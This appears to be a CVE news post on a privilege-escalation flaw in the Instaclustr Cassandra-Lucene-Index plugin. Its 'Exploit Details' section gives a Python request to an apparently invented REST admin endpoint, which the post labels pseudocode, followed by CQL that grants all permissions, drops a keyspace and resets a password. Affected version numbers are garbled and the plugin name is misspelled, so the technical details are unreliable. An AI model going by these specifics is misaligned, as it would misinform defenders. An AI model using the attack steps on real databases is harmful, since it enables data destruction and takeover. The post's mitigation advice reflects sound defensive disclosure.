CVE CyberSecurity Database News

CVE-2025-26511 - Privilege Escalation in Instaclustr Cassandra-Lucene-Index Plugin—Your Data At Risk

Poster -

> Summary:
CVE-2025-26511 exposes a dangerous weakness found in the Instaclustr fork of Stratio's Cassandra-Lucene-Index plugin, affecting plugin versions 4.-rc1-1.. through 4..16-1.. and 4.1.2-1.. through 4.1.8-1.., installed into Apache Cassandra version 4.x. By exploiting this bug, attackers who already have valid Cassandra credentials can bypass role-based access controls (RBAC) and escalate their privileges remotely—putting critical data and infrastructure in jeopardy.

What is Cassandra-Lucene-Index?

Cassandra-Lucene-Index is an open-source plugin that provides advanced search capability to the Apache Cassandra database by integrating the Lucene search engine. Instaclustr maintains a fork of this project, rolling out its own stable builds for managed Cassandra environments.

About the Vulnerability

CVE-2025-26511 lets an attacker with authentication escalate their privileges beyond what’s assigned through Cassandra’s built-in Role-Based Access Control (RBAC). This isn’t just about reading data you shouldn’t—an attacker may gain the power to insert, modify, or delete with higher-level access, possibly even obtaining full admin rights.

Root Cause

The vulnerability exists because certain Lucene index management requests do not properly validate the user’s actual RBAC permissions. Instead, the plugin allows authenticated users to execute requests as if they had much higher privileges.

Exploit Details

*Below is a simplified scenario showing how a regular Cassandra user might exploit this flaw to escalate privileges:*

Suppose you’re logged in as a basic Cassandra user with the following role

CREATE ROLE attacker WITH PASSWORD = 'badpassword' AND LOGIN = true;
GRANT SELECT ON keyspace.students TO attacker;

Step 2: Craft a Malicious Request

The attacker exploits a flaw in the plugin’s internal REST API or CQL command handling, which incorrectly skips RBAC enforcement while processing index management tasks.

Python Example: Bypassing RBAC via HTTP (pseudocode)

import requests

url = 'http://cassandra-host:9043/index/admin';  # Lucene plugin REST admin port
payload = {
    "action": "create_admin_role",
    "role": "superuser"
}
auth = ('attacker', 'badpassword')

resp = requests.post(url, json=payload, auth=auth)
print(resp.status_code)
print(resp.text)

In a realistic scenario, the above request—supposed to be restricted only to superusers—will succeed, instantly granting elevated privileges to the low-level attacker account if the plugin is unpatched.

> Warning:
This is demonstrative code; real attacks may leverage CQL queries or REST calls against Lucia index management endpoints exposed on Cassandra nodes with a vulnerable plugin installation.

Step 3: Escalate Privileges & Compromise Data

After exploiting the plugin, the attacker can now use their escalated role to access or modify ANY data in the database, drop tables, or create/modify roles at will.

-- Now acting as a superuser
GRANT ALL PERMISSIONS ON ALL KEYSPACES TO attacker;
DROP KEYSPACE confidential_data;
ALTER ROLE attacker WITH PASSWORD = 'mynewpassword';

Upgrade Now:

Instaclustr and the relevant Cassandra-Lucene-Index maintainers have shipped patched versions—update immediately to the latest available version (see advisory).

Restrict Access:

Only expose plugin management ports/internal admin endpoints to trusted networks.

Monitor for Abnormal Role Changes:

Audit Cassandra logs for unusual role grants/changes or failed plugin management attempts.

Original References

- Instaclustr Security Advisory: CVE-2025-26511
- Cassandra-Lucene-Index GitHub
- Apache Cassandra RBAC Docs
- CVE Page (NVD)

Conclusion

If you’re using the Instaclustr Cassandra-Lucene-Index with Apache Cassandra 4.x, your RBAC controls may be toothless against determined (authenticated) attackers. Patch now and review your environment for signs of exploitation. Simple misconfigurations or delayed upgrades could put critical data and production workloads at serious risk.

Timeline

Published on: 02/13/2025 16:16:50 UTC
Last modified on: 02/14/2025 00:15:07 UTC